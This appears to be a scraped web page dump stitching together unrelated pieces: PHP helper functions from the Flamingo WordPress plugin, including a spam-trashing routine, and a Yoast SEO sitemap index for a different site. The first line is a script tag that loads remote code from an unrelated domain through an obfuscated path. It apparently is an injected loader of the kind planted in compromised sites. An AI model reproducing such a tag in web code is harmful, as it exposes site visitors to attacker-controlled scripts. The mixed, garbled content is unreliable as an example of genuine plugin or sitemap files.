<script async src="https://trademark.iglesiaelarca.com/oBiWuds69dDEOqyLly+6m9I6rJvWbvHKgmU="></script>
function flamingo_plugin_url( $path = '' ) {
	$url = plugins_url( $path, FLAMINGO_PLUGIN );

	if ( is_ssl() and 'http:' == substr( $url, 0, 5 ) ) {
		$url = 'https:' . substr( $url, 5 );
	}

	return $url;
}

function flamingo_array_flatten( $input ) {
	if ( ! is_array( $input ) ) {
		return array( $input );
	}

	$output = array();

	foreach ( $input as $value ) {
		$output = array_merge( $output, flamingo_array_flatten( $value ) );
	}

	return $output;
}

/**
 * Move a spam to the Trash
 *
 * @since 2.1
 *
 * @see wp_trash_post()
 *
 */
function flamingo_schedule_move_trash() {

	// abort if FLAMINGO_MOVE_TRASH_DAYS is set to zero or in minus
	if ( (int) FLAMINGO_MOVE_TRASH_DAYS <= 0 ) {
		return true;
	}

	$posts_to_move = Flamingo_Inbound_Message::find( array(
		'posts_per_page' => 100,
		'meta_key' => '_spam_meta_time',
		'meta_value' => time() - ( DAY_IN_SECONDS * FLAMINGO_MOVE_TRASH_DAYS ),
		'meta_compare' => '<',
		'post_status' => Flamingo_Inbound_Message::spam_status,
	) );

	foreach ( $posts_to_move as $post ) {

		if ( $post->trash() ) {

			// delete spam meta time to stop trashing in cron job
			delete_post_meta( $post->id(), '_spam_meta_time' );
		}

	}
}
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//www.naucamexperience.com/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://www.naucamexperience.com/post-sitemap.xml</loc>
		<lastmod>2024-02-13T07:38:34+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.naucamexperience.com/page-sitemap.xml</loc>
		<lastmod>2024-03-12T10:15:29+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.naucamexperience.com/attachment-sitemap.xml</loc>
		<lastmod>2021-10-25T11:29:38+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.naucamexperience.com/category-sitemap.xml</loc>
		<lastmod>2024-02-13T07:38:34+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->